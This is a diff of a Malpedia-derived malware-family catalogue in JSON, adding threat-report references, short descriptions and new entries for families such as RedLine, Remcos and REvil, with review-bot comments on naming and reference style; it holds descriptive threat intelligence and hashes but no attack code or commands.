 "meta": {
@@ -25982,17 +29629,26 @@ "value": "RedLeaves" }, { - "description": "Redline Stealer is a malware available on underground forums for sale apparently as standalone versions or also on a subscription basis. This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of Redliune added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.", + "description": "RedLine Stealer is a malware available on underground forums for sale apparently as standalone versions or also on a subscription basis. This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. 
FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer", - "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", - "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns", - "https://www.bleepingcomputer.com/news/security/redline-info-stealing-malware-spread-by-folding-home-phishing/", "https://www.proofpoint.com/us/threat-insight/post/new-redline-stealer-distributed-using-coronavirus-themed-email-campaign", - "https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack" + "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://cyber-anubis.github.io/malware%20analysis/redline/", + "https://blogs.blackberry.com/en/2021/07/threat-thursday-redline-infostealer", + "https://blog.minerva-labs.com/become-a-vip-victim-with-new-discord-distributed-malware", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://blogs.juniper.net/en-us/threat-research/new-pastebin-like-service-used-in-multiple-malware-campaigns", + "https://blog.minerva-labs.com/redline-stealer-masquerades-as-telegram-installer", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", + 
"https://blog.morphisec.com/google-ppc-ads-deliver-redline-taurus-and-mini-redline-infostealers", + "https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html", + "https://www.proofpoint.com/us/threat-insight/post/ta505-and-others-launch-new-coronavirus-campaigns-now-largest-collection-attack", + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md", + "https://www.bleepingcomputer.com/news/security/redline-info-stealing-malware-spread-by-folding-home-phishing/", + "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html" ], "synonyms": [], "type": [] @@ -26000,6 +29656,19 @@ "uuid": "ff18a858-7778-485c-949b-d28d867d1ffb", "value": "RedLine Stealer" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.redosdru", + "https://securitynews.sonicwall.com/xmlpost/redosdru-v-malware-that-hides-in-encrypted-dll-files-to-avoid-detection-by-firewalls-may-112016/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "eb7a5417-ebbe-42c9-834b-2412a7e338f1", + "value": "Redosdru" + }, { "description": "", "meta": { @@ -26016,7 +29685,7 @@ "value": "REDPEPPER" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.redrum", @@ -26030,7 +29699,7 @@ "type": [] }, "uuid": "cbb4cfd8-3642-4b04-a199-8e9b4b80fb62", - "value": "RedRum Ransomware" + "value": "RedRum" }, { "description": "", 
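Review bot: `"description": "Ransomware."` in the RedRum hunk moves the category into free text while the structured `"type": []` on the same entry stays empty; the RekenSom and Reveton hunks that follow do the same. If `type` is intended to carry the family category (it is empty on every entry visible here, so this may be a deliberate convention), populating it would let consumers filter on a field instead of parsing descriptions. Otherwise a description that adds something the `value` does not already imply, or an empty one as before, is more useful than a single word.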
@@ -26107,7 +29776,10 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.regeorg",
+ "https://www.secureworks.com/research/samsam-ransomware-campaigns",
+ "https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF",
 "https://sensepost.com/discover/tools/reGeorg/",
+ "https://www.secureworks.com/blog/ransomware-deployed-by-adversary",
 "https://github.com/sensepost/reGeorg"
 ],
 "synonyms": [],
@@ -26150,7 +29822,7 @@
 "value": "RegretLocker"
 },
 {
- "description": "",
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.rekensom",
@@ -26162,7 +29834,23 @@
 "type": []
 },
 "uuid": "b59a97df-04c5-4e54-a7aa-92452baa7240",
- "value": "RekenSom Ransomware"
+ "value": "RekenSom"
+ },
+ {
+ "description": "A Trojan for Winows with the same code structure and functionalities of elf.rekoobe, for Linux environment instead. ",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.rekoobew",
+ "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/"
+ ],
+ "synonyms": [
+ "tinyshell.win",
+ "tshd.win"
+ ],
+ "type": []
+ },
+ "uuid": "e928d9ca-237f-48ab-ab4c-65c04baeb863",
+ "value": "win.rekoobe"
 },
 {
 "description": "",
@@ -26197,7 +29885,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcom",
- "https://doublepulsar.com/second-zerologon-attacker-seen-exploiting-internet-honeypot-c7fb074451ef"
+ "https://doublepulsar.com/second-zerologon-attacker-seen-exploiting-internet-honeypot-c7fb074451ef",
+ "http://www.secureworks.com/research/threat-profiles/gold-franklin"
 ],
 "synonyms": [
 "RemoteCommandExecution"
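Review bot: The new entry's `"value": "win.rekoobe"` is a Malpedia slug while every other `value` in this file is a display name (RekenSom, RemCom, Razy, RedDelta), and it does not even match the entry's own Malpedia ref, which points at `win.rekoobew`; since `value` becomes the cluster's visible name and tag, a display name consistent with its neighbours (presumably Rekoobe, to be confirmed against the referenced Malpedia page) is expected here. The description also has a typo and a trailing space inside the string: `"description": "A Trojan for Windows with the same code structure and functionality as elf.rekoobe, its Linux counterpart."` would read cleanly.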
@@ -26212,35 +29901,48 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos", + "https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service", "https://dissectingmalwa.re/malicious-ratatouille.html", "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads", "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", "https://github.com/1d8/analyses/blob/master/RemcosDocDropper.MD", + "https://www.telsy.com/download/4832/", "https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html", "https://www.fortinet.com/blog/threat-research/new-variant-of-remcos-rat-observed-in-the-wild.html", "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html", "https://secrary.com/ReversingMalware/RemcosRAT/", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html", + "https://www.welivesecurity.com/2021/10/06/moon-hack-fake-safemoon-cryptocurrency-app-drops-malware-spy/", "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/", "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire", + "https://www.trendmicro.com/en_ca/research/19/h/analysis-new-remcos-rat-arrives-via-phishing-email.html", "https://blog.fortinet.com/2017/02/14/remcos-a-new-rat-in-the-wild-2", + "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html", "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", "https://myonlinesecurity.co.uk/fake-order-spoofed-from-finchers-ltd-sankyo-rubber-delivers-remcos-rat-via-ace-attachments/", 
"https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", + "https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", "http://malware-traffic-analysis.net/2017/12/22/index.html", "https://blog.checkpoint.com/2019/06/19/sandblast-agent-phishing-germany-campaign-security-hack-ransomware/", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://krabsonsecurity.com/2018/03/02/analysing-remcos-rats-executable/", "https://news.sophos.com/en-us/2020/05/14/raticate/", + "https://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly", + "https://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/", - "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://www.bitdefender.com/files/News/CaseStudies/study/390/Bitdefender-PR-Whitepaper-Remcos-creat5080-en-EN-GenericUse.pdf", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", "https://www.vmray.com/cyber-security-blog/smart-memory-dumping/", - "https://www.youtube.com/watch?v=DIH4SvKuktM" + 
"https://www.youtube.com/watch?v=DIH4SvKuktM", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols" ], "synonyms": [ "RemcosRAT", @@ -26408,13 +30110,19 @@ "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html", "https://isc.sans.edu/diary/rss/22590", + "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://securelist.com/revengehotels/95229/", + "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html", + "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader", "https://www.binarydefense.com/revenge-is-a-dish-best-served-obfuscated", + "https://yoroi.company/research/the-evolution-of-aggah-from-roma225-to-the-rg-campaign/", "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/", - "https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america", + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", "https://blogs.360.cn/post/APT-C-44.html", "https://blog.reversinglabs.com/blog/rats-in-the-library", + "https://www.uptycs.com/blog/revenge-rat-targeting-users-in-south-america", + "https://blog.reversinglabs.com/blog/dotnet-loaders", "https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/", "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g" ], 
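Review bot: `https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries` in the Revenge RAT refs points at an entire repository rather than the query that mentions this family, so a reader cannot tell which content supports the reference and the default branch can change underneath it. Linking the specific file, ideally pinned to a commit, keeps the reference verifiable in the same way the other GitHub refs in this file (for example the StrangerealIntel analysis path in the RedLine entry) already are.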
@@ -26428,6 +30136,19 @@
 },
 {
 "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.reverse_rat",
+ "https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "c3b6a9f9-afef-4249-ab59-afc5b2efc0b3",
+ "value": "ReverseRAT"
+ },
+ {
+ "description": "Ransomware.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.reveton",
@@ -26437,106 +30158,232 @@ "type": [] }, "uuid": "48c10822-9af8-4324-9516-b33ecf975590", - "value": "Reveton Ransomware" + "value": "Reveton" }, { "description": "REvil Beta\r\nMD5: bed6fc04aeb785815744706239a1f243\r\nSHA1: 3d0649b5f76dbbff9f86b926afbd18ae028946bf\r\nSHA256: 3641b09bf6eae22579d4fd5aae420476a134f5948966944189a70afd8032cb45\r\n* Privilege escalation via CVE-2018-8453 (64-bit only)\r\n* Rerun with RunAs to elevate privileges\r\n* Implements a requirement that if \"exp\" is set, privilege escalation must be successful for full execution to occur\r\n* Implements target whitelisting using GetKetboardLayoutList\r\n* Contains debug console logging functionality\r\n* Defines the REvil registry root key as SOFTWARE\\!test\r\n* Includes two variable placeholders in the ransom note: UID & KEY\r\n* Terminates processes specified in the \"prc\" configuration key prior to encryption\r\n* Deletes shadow copies and disables recovery\r\n* Wipes contents of folders specified in the \"wfld\" configuration key prior to encryption\r\n* Encrypts all non-whitelisted files on fixed drives\r\n* Encrypts all non-whitelisted files on network mapped drives if it is running with System-level privileges or can impersonate the security context of explorer.exe\r\n* Partially implements a background image setting to display a basic \"Image text\" message\r\n* Sends encrypted system data to a C2 domain via an HTTPS POST request (URI path building is not implemented.)\r\n------------------------------------\r\nREvil 1.00\r\nMD5: 65aa793c000762174b2f86077bdafaea\r\nSHA1: 95a21e764ad0c98ea3d034d293aee5511e7c8457\r\nSHA256: f0c60f62ef9ffc044d0b4aeb8cc26b971236f24a2611cb1be09ff4845c3841bc\r\n* Adds 32-bit implementation of CVE-2018-8453 exploit\r\n* Removes console debug logging\r\n* Changes the REvil registry root key to SOFTWARE\\recfg\r\n* Removes the System/Impersonation success requirement for encrypting network mapped drives\r\n* Adds a \"wipe\" key to the configuration for 
optional folder wiping\r\n* Fully implements the background image setting and leverages values defined in the \"img\" configuration key\r\n* Adds an EXT variable placeholder to the ransom note to support UID, KEY, and EXT\r\n* Implements URI path building so encrypted system data is sent to a C2 pseudo-random URL\r\n* Fixes the function that returns the victim's username so the correct value is placed in the stats JSON data\r\n------------------------------------\r\nREvil 1.01\r\nMD5: 2abff29b4d87f30f011874b6e98959e9\r\nSHA1: 9d1b61b1cba411ee6d4664ba2561fa59cdb0732c\r\nSHA256: a88e2857a2f3922b44247316642f08ba8665185297e3cd958bbd22a83f380feb\r\n* Removes the exp/privilege escalation requirement for full execution and encrypts data regardless of privilege level\r\n* Makes encryption of network mapped drives optional by adding the \"-nolan\" argument\r\n------------------------------------\r\nREvil 1.02\r\nMD5: 4af953b20f3a1f165e7cf31d6156c035\r\nSHA1: b859de5ffcb90e4ca8e304d81a4f81e8785bb299\r\nSHA256: 89d80016ff4c6600e8dd8cfad1fa6912af4d21c5457b4e9866d1796939b48dc4\r\n* Enhances whitelisting validation by adding inspection of GetUserDefaultUILanguage and GetSystemDefaultUILanguage\r\n* Partially implements \"lock file\" logic by generating a lock filename based on the first four bytes of the Base64-decoded pk key, appending a .lock file extension, and adding the filename to the list of whitelisted files in the REvil configuration (It does not appear that this value is referenced after it is created and stored in memory. 
There is no evidence that a lock file is dropped to disk.)\r\n* Enhances folder whitelisting logic that take special considerations if the folder is associated with \"program files\" directories\r\n* Hard-codes whitelisting of all direct content within the Program Files or Program Files x86 directories\r\n* Hard-codes whitelisting of \"sql\" subfolders within program files\r\n* Encrypts program files sub-folders that does not contain \"sql\" in the path\r\n* Compares other folders to the list of whitelisted folders specified in the REvil configuration to determine if they are whitelisted\r\n* Encodes stored strings used for URI building within the binary and decodes them in memory right before use\r\n* Introduces a REvil registry root key \"sub_key\" registry value containing the attacker's public key\r\n------------------------------------\r\nREvil 1.03\r\nMD5: 3cae02306a95564b1fff4ea45a7dfc00\r\nSHA1: 0ce2cae5287a64138d273007b34933362901783d\r\nSHA256: 78fa32f179224c46ae81252c841e75ee4e80b57e6b026d0a05bb07d34ec37bbf\r\n* Removes lock file logic that was partially implemented in 1.02\r\n* Leverages WMI to continuously monitor for and kill newly launched processes whose names are listed in the prc configuration key (Previous versions performed this action once.)\r\n* Encodes stored shellcode\r\n* Adds the -path argument:\r\n* Does not wipe folders (even if wipe == true)\r\n* Does not set desktop background\r\n* Does not contact the C2 server (even if net == true)\r\n* Encrypts files in the specified folder and drops the ransom note\r\n* Changes the REvil registry root key to SOFTWARE\\QtProject\\OrganizationDefaults\r\n* Changes registry key values from --> to:\r\n * sub_key --> pvg\r\n * pk_key --> sxsP\r\n * sk_key --> BDDC8\r\n * 0_key --> f7gVD7\r\n * rnd_ext --> Xu7Nnkd\r\n * stat --> sMMnxpgk\r\n------------------------------------\r\nREvil 1.04\r\nMD5: 6e3efb83299d800edf1624ecbc0665e7\r\nSHA1: 0bd22f204c5373f1a22d9a02c59f69f354a2cc0d\r\nSHA256: 
2ca64feaaf5ab6cf96677fbc2bc0e1995b3bc93472d7af884139aa757240e3f6\r\n* Leverages PowerShell and WMI to delete shadow copies if the victim's operating system is newer than Windows XP (For Windows XP or older, it uses the original command that was executed in all previous REvil versions.)\r\n* Removes the folder wipe capability\r\n* Changes the REvil registry root key to SOFTWARE\\GitForWindows\r\n* Changes registry key values from --> to:\r\n * pvg --> QPM\r\n * sxsP --> cMtS\r\n * BDDC8 --> WGg7j\r\n * f7gVD7 --> zbhs8h\r\n * Xu7Nnkd --> H85TP10\r\n * sMMnxpgk --> GCZg2PXD\r\n------------------------------------\r\nREvil v1.05\r\nMD5: cfefcc2edc5c54c74b76e7d1d29e69b2\r\nSHA1: 7423c57db390def08154b77e2b5e043d92d320c7\r\nSHA256: e430479d1ca03a1bc5414e28f6cdbb301939c4c95547492cdbe27b0a123344ea\r\n* Add new 'arn' configuration key that contains a boolean true/false value that controls whether or not to implement persistence.\r\n* Implements persistence functionality via registry Run key. Data for value is set to the full path and filename of the currently running executable. The executable is never moved into any 'working directory' such as %AppData% or %TEMP% as part of the persistence setup. The Reg Value used is the hardcoded value of 'lNOWZyAWVv' :\r\n * SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\lNOWZyAWVv\r\n* Before exiting, REvil sets up its malicious executable to be deleted upon reboot by issuing a call to MoveFileExW and setting the destination to NULL and the flags to 4 (MOVEFILE_DELAY_UNTIL_REBOOT). 
This breaks persistence however as the target executable specified in the Run key will no longer exist once this is done.\r\n* Changes registry key values from --> to:\r\n * QPM --> tgE\r\n * cMtS --> 8K09\r\n * WGg7j --> xMtNc\r\n * zbhs8h --> CTgE4a\r\n * H85TP10 --> oE5bZg0\r\n * GCZg2PXD --> DC408Qp4\r\n------------------------------------\r\nREvil v1.06\r\nMD5: 65ff37973426c09b9ff95f354e62959e\r\nSHA1: b53bc09cfbd292af7b3609734a99d101bd24d77e\r\nSHA256: 0e37d9d0a7441a98119eb1361a0605042c4db0e8369b54ba26e6ba08d9b62f1e\r\n* Updated string decoding function to break existing yara rules. Likely the result of the blog posted by us.\r\n* Modified handling of network file encryption. Now explicitly passes every possible \"Scope\" constant to the WNetOpenEnum function when looking for files to encrypt. It also changed the 'Resource Type\" from RESOURCETYPE_DISK to RESOURCETYPE_ANY which will now include things like mapped printers.\r\n* Persistence registry value changed from 'lNOWZyAWVv' to 'sNpEShi30R'\r\n* Changes registry key values from --> to:\r\n * tgE --> 73g\r\n * 8K09 --> vTGj\r\n * xMtNc --> Q7PZe\r\n * CTgE4a --> BuCrIp\r\n * oE5bZg0 --> lcZd7OY\r\n * DC408Qp4 --> sLF86MWC\r\n------------------------------------\r\nREvil v1.07\r\nMD5: ea4cae3d6d8150215a4d90593a4c30f2\r\nSHA1: 8dcbcbefaedf5675b170af3fd44db93ad864894e\r\nSHA256: 6a2bd52a5d68a7250d1de481dcce91a32f54824c1c540f0a040d05f757220cd3\r\nTBD", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.revil", + "https://therecord.media/i-scrounged-through-the-trash-heaps-now-im-a-millionaire-an-interview-with-revils-unknown/", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", + "https://twitter.com/VK_Intel/status/1374571480370061312?s=20", "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", - "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + 
"https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", + "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html", + "https://blog.group-ib.com/REvil_RaaS", "https://www.tgsoft.it/english/news_archivio_eng.asp?id=1004", + "https://www.pandasecurity.com/emailhtml/2007-CAM-RANSOMWARE-AD360-WG/2006-Report-Sodinokibi-EN.pdf", "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html", "https://blog.intel471.com/2020/03/31/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/", + "https://www.bleepingcomputer.com/news/security/revil-ransomware-devs-added-a-backdoor-to-cheat-affiliates/", "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-threatens-to-publish-data-of-automotive-group/", + "https://twitter.com/fwosar/status/1411281334870368260", "https://www.zdnet.com/article/revil-ransomware-gang-launches-auction-site-to-sell-stolen-data/", + "https://news.sophos.com/en-us/2021/06/11/relentless-revil-revealed/", + "https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/", "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf", + "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/", + "https://www.netskope.com/blog/netskope-threat-coverage-revil", "https://krebsonsecurity.com/2019/07/is-revil-the-new-gandcrab-ransomware/", + "https://twitter.com/VK_Intel/status/1411066870350942213", "https://public.intel471.com/blog/revil-ransomware-interview-russian-osint-100-million/", "https://medium.com/@underthebreach/tracking-down-revils-lalartu-by-utilizing-multiple-osint-methods-2bf3a6c65a80", - "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", + "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", + 
"https://www.advanced-intel.com/post/revil-vanishes-from-underground-infrastructure-down-support-staff-adverts-silent", + "https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version", "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf", + "https://www.washingtonpost.com/national-security/ransomware-fbi-revil-decryption-key/2021/09/21/4a9417d0-f15f-11eb-a452-4da5fe48582d_story.html", + "https://www.flashpoint-intel.com/blog/revils-cryptobackdoor-con-ransomware-groups-tactics-roil-affiliates-sparking-a-fallout/", "https://f.hubspotusercontent10.net/hubfs/5943619/Whitepaper-Downloads/Ransomware_in_ICS_Environments_Whitepaper_10_12_20.pdf", + "http://www.secureworks.com/research/threat-profiles/gold-southfield", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://twitter.com/svch0st/status/1411537562380816384", + "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/", "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-says-travelex-will-pay-one-way-or-another/", + "https://www.youtube.com/watch?v=P8o6GItci5w", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", + "https://www.digitalshadows.com/blog-and-research/competitions-on-russian-language-cybercriminal-forums-sharing-expertise-or-threat-actor-showboating/", "https://www.bleepingcomputer.com/news/security/another-ransomware-will-now-publish-victims-data-if-not-paid/", - "https://www.bleepingcomputer.com/news/security/new-jersey-synagogue-suffers-sodinokibi-ransomware-attack/", + "https://blog.truesec.com/2021/07/06/kaseya-vsa-zero-day-exploit", + "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/", 
"https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "https://asec.ahnlab.com/ko/19860/", + "https://drive.google.com/file/d/1ph1E0onZ7TiNyG87k4WjofCKNuCafMLk/view", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://securityaffairs.co/wordpress/98694/malware/sodinokibi-kenneth-cole-data-breach.html", + "https://www.bleepingcomputer.com/news/security/new-jersey-synagogue-suffers-sodinokibi-ransomware-attack/", + "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/", "https://awakesecurity.com/blog/threat-hunting-for-revil-ransomware/", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", - "https://www.appgate.com/blog/electric-company-ransomware-attack-calls-for-14-million-in-ransom", + "https://twitter.com/fwosar/status/1420119812815138824", + "https://hatching.io/blog/ransomware-part2", "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout", + "https://www.flashpoint-intel.com/blog/possible-universal-revil-master-key-posted-to-xss/", + "https://www.secureworks.com/research/lv-ransomware", "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", "https://sites.temple.edu/care/ci-rw-attacks/", + "https://www.huntress.com/blog/security-researchers-hunt-to-discover-origins-of-the-kaseya-vsa-mass-ransomware-incident", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/undressing-the-revil/", + "https://community.riskiq.com/article/3315064b", "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf", 
"https://www.bleepingcomputer.com/news/security/ransomware-threatens-to-reveal-companys-dirty-secrets/", "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf", + "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/", + "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", + "https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released", "https://ke-la.com/easy-way-in-5-ransomware-victims-had-their-pulse-secure-vpn-credentials-leaked/", "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/", "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", + "https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/", "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/", "https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/", + "https://twitter.com/_alex_il_/status/1412403420217159694", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.digitalshadows.com/blog-and-research/competitions-on-russian-language-cybercriminal-forums-sharing-expertise-or-threat-actor-showboating/", + "https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://www.boll.ch/datasheets/WG_Threat_Report_EN.pdf", + "https://blog.gigamon.com/2021/07/08/observations-and-recommendations-from-the-ongoing-revil-kaseya-incident/", + 
"https://twitter.com/Jacob_Pimental/status/1391055792774729728", + "https://twitter.com/SophosLabs/status/1412056467201462276", + "https://threatpost.com/ransomware-revil-sites-disappears/167745/", + "https://searchsecurity.techtarget.com/feature/Ransomware-negotiations-An-inside-look-at-the-process", "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf", + "https://blog.morphisec.com/real-time-prevention-of-the-kaseya-vsa-supply-chain-revil-ransomware-attack", + "https://www.bleepingcomputer.com/news/security/kaseya-obtains-universal-decryptor-for-revil-ransomware-victims/", "https://www.certego.net/en/news/malware-tales-sodinokibi/", "https://www.secureworks.com/blog/revil-the-gandcrab-connection", - "https://hatching.io/blog/ransomware-part2", + "https://f.hubspotusercontent10.net/hubfs/7095517/FLINT-Kaseya-Another%20Massive%20Heist%20by%20REvil.pdf", + "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities", + "https://www.appgate.com/blog/electric-company-ransomware-attack-calls-for-14-million-in-ransom", + 